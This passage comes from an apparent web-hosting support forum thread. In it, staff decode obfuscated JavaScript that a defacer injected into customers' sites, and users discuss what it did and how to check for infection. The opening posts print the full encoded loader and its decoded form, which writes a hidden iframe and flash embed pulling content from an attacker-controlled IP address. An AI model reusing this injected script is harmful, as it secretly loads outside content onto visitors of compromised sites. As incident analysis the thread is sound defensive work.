\x6A\x6B\x77\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x7A\x6C\x67\x77\x6B\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x25\x32\x38\x35\x33\x76\x75\x66\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x37\x33\x37\x31\x73\x6B\x73\x25\x32\x38\x35\x35\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x32\x6C\x69\x75\x64\x70\x68\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x68\x70\x65\x68\x67\x25\x32\x38\x35\x33\x76\x75\x66\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x45\x25\x37\x43\x62\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x31\x76\x7A\x69\x25\x32\x38\x36\x49\x76\x72\x78\x71\x67\x76\x7A\x69\x25\x32\x38\x36\x47\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x31\x76\x7A\x69\x25\x32\x38\x35\x39\x64\x78\x77\x72\x73\x6F\x64\x25\x37\x43\x25\x32\x38\x36\x47\x34\x25\x32\x38\x35\x39\x6F\x72\x72\x73\x76\x25\x32\x38\x36\x47\x34\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x7A\x6C\x67\x77\x6B\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x6B\x68\x6C\x6A\x6B\x77\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x77\x25\x37\x43\x73\x68\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x64\x73\x73\x6F\x6C\x66\x64\x77\x6C\x72\x71\x32\x25\x37\x42\x30\x76\x6B\x72\x66\x6E\x7A\x64\x79\x68\x30\x69\x6F\x64\x76\x6B\x25\x32\x38\x35\x35\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x32\x68\x70\x65\x68\x67\x25\x32\x38\x36\x48\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x36\x45\x25\x32\x38\x36\x46\x32\x76\x66\x75\x6C\x73\x77\x25\x32\x38\x36\x48\x33"
];

   document[_0xd8af[1]](unescape(_0xd8af[0]));

   dF(_0xd8af[2]);

</script>

<!-- mp3 code ended -->




When we clean this up, we get:
Code: Select all
<!-- mp3 code starts from here,feel free to copy/paste -->

<script language="javascript">

var _0xd8af=[
   "\x25\x33\x43\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x32\x30\x25\x36\x43\x25\x36\x31\x25\x36\x45\x25\x36\x37\x25\x37\x35\x25\x36\x31\x25\x36\x37\x25\x36\x35\x25\x33\x44\x25\x32\x32\x25\x36\x41\x25\x36\x31\x25\x37\x36\x25\x36\x31\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x32\x32\x25\x33\x45\x25\x36\x36\x25\x37\x35\x25\x36\x45\x25\x36\x33\x25\x37\x34\x25\x36\x39\x25\x36\x46\x25\x36\x45\x25\x32\x30\x25\x36\x34\x25\x34\x36\x25\x32\x38\x25\x37\x33\x25\x32\x39\x25\x37\x42\x25\x37\x36\x25\x36\x31\x25\x37\x32\x25\x32\x30\x25\x37\x33\x25\x33\x31\x25\x33\x44\x25\x37\x35\x25\x36\x45\x25\x36\x35\x25\x37\x33\x25\x36\x33\x25\x36\x31\x25\x37\x30\x25\x36\x35\x25\x32\x38\x25\x37\x33\x25\x32\x45\x25\x37\x33\x25\x37\x35\x25\x36\x32\x25\x37\x33\x25\x37\x34\x25\x37\x32\x25\x32\x38\x25\x33\x30\x25\x32\x43\x25\x37\x33\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x32\x44\x25\x33\x31\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x32\x30\x25\x37\x36\x25\x36\x31\x25\x37\x32\x25\x32\x30\x25\x37\x34\x25\x33\x44\x25\x32\x37\x25\x32\x37\x25\x33\x42\x25\x36\x36\x25\x36\x46\x25\x37\x32\x25\x32\x38\x25\x36\x39\x25\x33\x44\x25\x33\x30\x25\x33\x42\x25\x36\x39\x25\x33\x43\x25\x37\x33\x25\x33\x31\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x33\x42\x25\x36\x39\x25\x32\x42\x25\x32\x42\x25\x32\x39\x25\x37\x34\x25\x32\x42\x25\x33\x44\x25\x35\x33\x25\x37\x34\x25\x37\x32\x25\x36\x39\x25\x36\x45\x25\x36\x37\x25\x32\x45\x25\x36\x36\x25\x37\x32\x25\x36\x46\x25\x36\x44\x25\x34\x33\x25\x36\x38\x25\x36\x31\x25\x37\x32\x25\x34\x33\x25\x36\x46\x25\x36\x34\x25\x36\x35\x25\x32\x38\x25\x37\x33\x25\x33\x31\x25\x32\x45\x25\x36\x33\x25\x36\x38\x25\x36\x31\x25\x37\x32\x25\x34\x33\x25\x36\x46\x25\x36\x34\x25\x36\x35\x25\x34\x31\x25\x37\x34\x25\x32\x38\x25\x36\x39\x25\x32\x39\x25\x32\x44\x25\x37\x33\x25\x32\x45\x25\x37\x33\x25\x37\x35\x25\x36\x32\x25\x37\x33\x25\x37\x34\x25\x37\x32\x25\x32\x38\x25\x37\x33\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x32\x44\x25\x33\x31\x25\x32\x43\x25\x33\x31\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x36\x34\x25\x36\x46\x25\x36\x33\x25\x37\x35\x25\x36\x44\x25\x36\x35\x25\x36\x45\x25\x37\x34\x25\x32\x45\x25\x37\x37\x25\x37\x32\x25\x36\x39\x25\x37\x34\x25\x36\x35\x25\x32\x38\x25\x37\x35\x25\x36\x45\x25\x36\x35\x25\x37\x33\x25\x36\x33\x25\x36\x31\x25\x37\x30\x25\x36\x35\x25\x32\x38\x25\x37\x34\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x37\x44\x25\x33\x43\x25\x32\x46\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x33\x45",
   "\x77\x72\x69\x74\x65",
   "\x25\x32\x38\x36\x46\x76\x66\x75\x6C\x73\x77\x25\x32\x38\x36\x48\x6C\x69\x25\x32\x38\x35\x25\x33\x42\x67\x72\x66\x78\x70\x68\x71\x77\x31\x77\x6C\x77\x6F\x68\x25\x32\x38\x35\x34\x25\x32\x38\x36\x47\x25\x32\x38\x35\x25\x33\x41\x4B\x64\x66\x6E\x68\x47\x25\x32\x38\x35\x33\x45\x25\x37\x43\x25\x32\x38\x35\x33\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x25\x33\x41\x45\x68\x25\x37\x42\x6C\x77\x25\x32\x38\x35\x25\x33\x42\x33\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x36\x45\x25\x32\x38\x25\x33\x41\x47\x25\x32\x38\x33\x44\x67\x72\x66\x78\x70\x68\x71\x77\x31\x7A\x75\x6C\x77\x68\x25\x32\x38\x35\x25\x33\x42\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x36\x46\x6C\x69\x75\x64\x70\x68\x25\x32\x38\x35\x33\x69\x75\x64\x70\x68\x65\x72\x75\x67\x68\x75\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x6B\x68\x6C\x6A\x6B\x77\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x7A\x6C\x67\x77\x6B\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x25\x32\x38\x35\x33\x76\x75\x66\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x37\x33\x37\x31\x73\x6B\x73\x25\x32\x38\x35\x35\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x32\x6C\x69\x75\x64\x70\x68\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x68\x70\x65\x68\x67\x25\x32\x38\x35\x33\x76\x75\x66\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x45\x25\x37\x43\x62\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x31\x76\x7A\x69\x25\x32\x38\x36\x49\x76\x72\x78\x71\x67\x76\x7A\x69\x25\x32\x38\x36\x47\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x31\x76\x7A\x69\x25\x32\x38\x35\x39\x64\x78\x77\x72\x73\x6F\x64\x25\x37\x43\x25\x32\x38\x36\x47\x34\x25\x32\x38\x35\x39\x6F\x72\x72\x73\x76\x25\x32\x38\x36\x47\x34\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x7A\x6C\x67\x77\x6B\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x6B\x68\x6C\x6A\x6B\x77\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x77\x25\x37\x43\x73\x68\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x64\x73\x73\x6F\x6C\x66\x64\x77\x6C\x72\x71\x32\x25\x37\x42\x30\x76\x6B\x72\x66\x6E\x7A\x64\x79\x68\x30\x69\x6F\x64\x76\x6B\x25\x32\x38\x35\x35\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x32\x68\x70\x65\x68\x67\x25\x32\x38\x36\x48\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x36\x45\x25\x32\x38\x36\x46\x32\x76\x66\x75\x6C\x73\x77\x25\x32\x38\x36\x48\x33"
];

   document[_0xd8af[1]](unescape(_0xd8af[0]));

   dF(_0xd8af[2]);

</script>

<!-- mp3 code ended -->


When we decode this further, we get:
Code: Select all
<!-- mp3 code starts from here,feel free to copy/paste -->

<script language="javascript">

var _0xd8af=[
   "%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E",
   "write",
   "%286Fvfulsw%286Hli%285%3Bgrfxphqw1wlwoh%2854%286G%285%3AKdfnhG%2853E%7C%2853WlJHU0PCWH%285%3A%285%3C%28%3AEh%7Blw%285%3B3%285%3C%286E%28%3AG%283Dgrfxphqw1zulwh%285%3B%285%3A%286Fliudph%2853iudpherughu%286G%28553%2855%2853khljkw%286G%28553%2855%2853zlgwk%286G%28553%2855%2853%2853vuf%286G%2855kwws%286D22%3A%3A157%3A19%3C19%3B211127371sks%2855%286H%286F2liudph%286H%286Fhpehg%2853vuf%286G%2855kwws%286D22%3A%3A157%3A19%3C19%3B21112E%7CbWlJHU0PCWH1vzi%286Ivrxqgvzi%286Gkwws%286D22%3A%3A157%3A19%3C19%3B21112WlJHU0PCWH1vzi%2859dxwrsod%7C%286G4%2859orrsv%286G4%2855%2853zlgwk%286G%28553%2855%2853khljkw%286G%28553%2855%2853w%7Csh%286G%2855dssolfdwlrq2%7B0vkrfnzdyh0iodvk%2855%286H%286F2hpehg%286H%285%3A%285%3C%286E%286F2vfulsw%286H3"
];

   document[_0xd8af[1]](unescape(_0xd8af[0]));

   dF(_0xd8af[2]);

</script>

<!-- mp3 code ended -->


And when we decode it further, we get:
Code: Select all
<!-- mp3 code starts from here,feel free to copy/paste -->

<script language="javascript">

var _0xd8af=[
   "<script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script>",
   "write",
   "%286Fvfulsw%286Hli%285%3Bgrfxphqw1wlwoh%2854%286G%285%3AKdfnhG%2853E%7C%2853WlJHU0PCWH%285%3A%285%3C%28%3AEh%7Blw%285%3B3%285%3C%286E%28%3AG%283Dgrfxphqw1zulwh%285%3B%285%3A%286Fliudph%2853iudpherughu%286G%28553%2855%2853khljkw%286G%28553%2855%2853zlgwk%286G%28553%2855%2853%2853vuf%286G%2855kwws%286D22%3A%3A157%3A19%3C19%3B211127371sks%2855%286H%286F2liudph%286H%286Fhpehg%2853vuf%286G%2855kwws%286D22%3A%3A157%3A19%3C19%3B21112E%7CbWlJHU0PCWH1vzi%286Ivrxqgvzi%286Gkwws%286D22%3A%3A157%3A19%3C19%3B21112WlJHU0PCWH1vzi%2859dxwrsod%7C%286G4%2859orrsv%286G4%2855%2853zlgwk%286G%28553%2855%2853khljkw%286G%28553%2855%2853w%7Csh%286G%2855dssolfdwlrq2%7B0vkrfnzdyh0iodvk%2855%286H%286F2hpehg%286H%285%3A%285%3C%286E%286F2vfulsw%286H3"
];

   document[_0xd8af[1]](unescape(_0xd8af[0]));

   dF(_0xd8af[2]);

</script>

<!-- mp3 code ended -->



There's some javascript in there, cleaned up it looks like:
Code: Select all
<script language="javascript">
function dF(s)
{
   var s1=unescape(s.substr(0,s.length-1));

   var t='';

   for(i=0;i<s1.length;i++)
      t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));
}
</script>



Above, a function named Df is created, and it is expecting a variable named s.

The function is called earlier in the script, here:
Code: Select all
dF(_0xd8af[2])


So you can see that it passes this variable:
Code: Select all
_0xd8af[2]


... which actuall equals:
Code: Select all
%286Fvfulsw%286Hli%285%3Bgrfxphqw1wlwoh%2854%286G%285%3AKdfnhG%2853E%7C%2853WlJHU0PCWH%285%3A%285%3C%28%3AEh%7Blw%285%3B3%285%3C%286E%28%3AG%283Dgrfxphqw1zulwh%285%3B%285%3A%286Fliudph%2853iudpherughu%286G%28553%2855%2853khljkw%286G%28553%2855%2853zlgwk%286G%28553%2855%2853%2853vuf%286G%2855kwws%286D22%3A%3A157%3A19%3C19%3B211127371sks%2855%286H%286F2liudph%286H%286Fhpehg%2853vuf%286G%2855kwws%286D22%3A%3A157%3A19%3C19%3B21112E%7CbWlJHU0PCWH1vzi%286Ivrxqgvzi%286Gkwws%286D22%3A%3A157%3A19%3C19%3B21112WlJHU0PCWH1vzi%2859dxwrsod%7C%286G4%2859orrsv%286G4%2855%2853zlgwk%286G%28553%2855%2853khljkw%286G%28553%2855%2853w%7Csh%286G%2855dssolfdwlrq2%7B0vkrfnzdyh0iodvk%2855%286H%286F2hpehg%286H%285%3A%285%3C%286E%286F2vfulsw%286H3


So when this script is executed, it does the following:
Code: Select all
if(document.title!='HackeD By TiGER-M@TE')
{
   exit(0);
}
document.write('<iframe frameborder="0" height="0" width="0"  src="http://77.247.69.68/.../404.php"></iframe>
<embed src="http://77.247.69.68/.../By_TiGER-M@TE.swf?soundswf=http://77.247.69.68/.../TiGER-M@TE.swf&autoplay=1&loops=1" width="0" height="0" type="application/x-shockwave-flash"></embed>');


So it was trying to load http://77.247.69.68/.../404.php in an iframe and then play the following flash file:
Code: Select all
http://77.247.69.68/.../By_TiGER-M@TE.swf?soundswf=http://77.247.69.68/.../TiGER-M@TE.swf&autoplay=1&loops=1



Both URLs in question don't load in a browser, so they in effect are useless. The 77.247.69.68 belongs to rackhosting.com, which I assume they found out what was going on and shut it down.
bradm
InMotion Staff
 
Posts: 357
Joined: Wed Jan 16, 2008 9:29 pm

Re: What does the TiGER-M@TE hack file actually do?

Postby Helius on Thu Sep 29, 2011 2:46 pm

Awesome! Thanks Brad. I actually already did this the day of the hack, but I'm sure others would like to know.
User avatar
Helius
Forum User
 
Posts: 26
Joined: Sun Jul 19, 2009 2:58 pm
Location: Virginia Beach

Re: What does the TiGER-M@TE hack file actually do?

Postby tsmwebb on Thu Sep 29, 2011 6:08 pm

Great work! That is exactly what I have been looking for. So, there is a potentially malicious payload in the script but it isn't working.

Question: the redirect doesn't work now, but did it work on Sunday? If so, what might it have done to our visitors who ran it?

Tom
tsmwebb
Forum User
 
Posts: 6
Joined: Thu Sep 29, 2011 6:16 am

Re: What does the TiGER-M@TE hack file actually do?

Postby bradm on Thu Sep 29, 2011 6:49 pm

Hi Tom,

Thanks for touching base.

Question: the redirect doesn't work now, but did it work on Sunday? If so, what might it have done to our visitors who ran it?


I assume that it worked on Sunday, otherwise I'm not sure why the hacker attempted to load that URL within an IFRAME. If the URL in the iframe attempted to load malware onto the users computer and they didn't have any antivirus programs running that caught it, then they may have been infected. It's really hard to say what that page actually did.

For anyone that is worried they might be infected, I highly recommend downloading the free version of malware bytes and scanning your computer, I've used that software numerous times with great success.

Thanks,
- Brad
bradm
InMotion Staff
 
Posts: 357
Joined: Wed Jan 16, 2008 9:29 pm

Re: What does the TiGER-M@TE hack file actually do?

Postby tsmwebb on Thu Sep 29, 2011 7:13 pm

bradm wrote:Hi Tom,

Thanks for touching base.

Question: the redirect doesn't work now, but did it work on Sunday? If so, what might it have done to our visitors who ran it?


I assume that it worked on Sunday, otherwise I'm not sure why the hacker attempted to load that URL within an IFRAME. If the URL in the iframe attempted to load malware onto the users computer and they didn't have any antivirus programs running that caught it, then they may have been infected. It's really hard to say what that page actually did.

For anyone that is worried they might be infected, I highly recommend downloading the free version of malware bytes and scanning your computer, I've used that software numerous times with great success.

Thanks,
- Brad


Thanks very much! That makes sense to me and is very useful. At the very least it will help me explain what happened to folks even less competent in these issues than I. Are you guys looking to see if the page was saved somewhere (eg. have you contacted the host) to see if you can id the actual malware?

I think it is worth noting that when I ran the file through VirusTotal (http://www.virustotal.com/index.html) several engines reported the exploit you found. The methods that you guys used to come to your initial conclusion that this was just a "defacement" hack seem inadequate. Next time (lets hope there isn't one) it might be worth running suspect files through VT or similar first.

Cheers!

Tom
tsmwebb
Forum User
 
Posts: 6
Joined: Thu Sep 29, 2011 6:16 am

Re: What does the TiGER-M@TE hack file actually do?

Postby bradm on Thu Sep 29, 2011 7:25 pm

Hi Tom,

Are you guys looking to see if the page was saved somewhere (eg. have you contacted the host) to see if you can id the actual malware?


I just sent RackHosting.com an email. We'll see what they say.

Thanks,
- Brad
bradm
InMotion Staff
 
Posts: 357
Joined: Wed Jan 16, 2008 9:29 pm

Re: What does the TiGER-M@TE hack file actually do?

Postby bradm on Fri Sep 30, 2011 12:16 pm

Hi everyone,

I was able to actually get that 404.php file and look at the contents.

That file does 2 things:

1. The file logged the visit to a visits.txt file. So bascially what happened is that every time a user visited one of his hacked pages, it logged the domain of the hacked page. In this way, he was able to keep track of how many people were viewing his hacked pages.

2. After doing #1 above, it redirected the user to:
http://www.google.com/search?q=hacked+by+tiger-m%40te

That is just a google search for "hacked by tiger-m@te". I assume his reason for doing this was to boost his ratings in google for anyone that search for his name.

As the iframe was hidden, users visiting the hacked sites where unaware of what was going on (IE the redirect to a google search).

Thanks,
- Brad
bradm
InMotion Staff
 
Posts: 357
Joined: Wed Jan 16, 2008 9:29 pm

Re: What does the TiGER-M@TE hack file actually do?

Postby Robert A. on Fri Sep 30, 2011 3:26 pm

Soon after the hack was placed, my site got a visit from this server:

217-162-28-98.static.tinext.net

which is in Switzerland. Evidently it was the hacker (or a colleague) verifying the hack. However, it did not visit my site default index page. Instead, it looked for /hacked-site (that is, my domain name followed by /hacked-site).

It is not clear to me why that worked. I would expect that the visiting hacked should have gotten a 404 error. But my 404 file is OK.

That successfully delivered the 12000+ bytes of code to the recipient, who checked twice. As is noted on another forum post, the code itself is rather harmless, but it calls an external file using an IFRAME, and that external file (unknown content) could be malicious. Prsumably the hacker blocked the URL for the IFRAME, which would make it safe to view his own code.

On my site, nobody other than the hacker was able to get the code. That's because my site is configured in a peculiar way (not recommended for other users, as it will not work with Wordpress, Joomla, or like software). Anyone else got a 403 or 404 error, until I fixed it.

As was noted elsewhere: The hacking files are not just at your site's top level; they will be in sub-directories too.
Robert A.
Forum User
 
Posts: 1
Joined: Fri Sep 30, 2011 3:15 pm

Re: What does the TiGER-M@TE hack file actually do?

Postby TimS on Fri Sep 30, 2011 5:06 pm

Hi Robert A.,

Thanks for commenting. The visit from the server was due to verification, but it was not compromising anything. The iframe you mentioned, which we have reviewed the code for does not contain anything malicious in nature.

If you have anymore questions or comments please feel free to contact us. thank you!

Tim S.
TimS
InMotion Staff
 
Posts: 385
Joined: Mon Sep 12, 2011 11:27 am

Re: What does the TiGER-M@TE hack file actually do?

Postby FlyFlRidge on Mon Oct 10, 2011 5:28 pm

A Stupid question/suggestion....

Couldn't INMOTION have a scan in place for when files are being Uploaded, that looks for this type of "escape character codes" which unescape to Javascript ??
FlyFlRidge
Forum User
 
Posts: 1
Joined: Mon Oct 10, 2011 5:24 pm

Re: What does the TiGER-M@TE hack file actually do?

Postby TimS on Tue Oct 11, 2011 1:22 pm

Hi FLyFlRidge,

Thanks for posting in the forums. We do have a tool running on the servers that scans files uploaded via FTP and looks for mal-intended code. However, due to this specific hackers methodology it may not have been fruitful. But the idea you spoke about is already in place.

If you have further questions or need any assistance please feel free to contact us.

Thank you!

Tim S.
TimS
InMotion Staff
 
Posts: 385
Joined: Mon Sep 12, 2011 11:27 am


Return to Directory Listing / Defacement Fix due to TiGER-M@TE hack

Who is online

Users browsing this forum: No registered users and 2 guests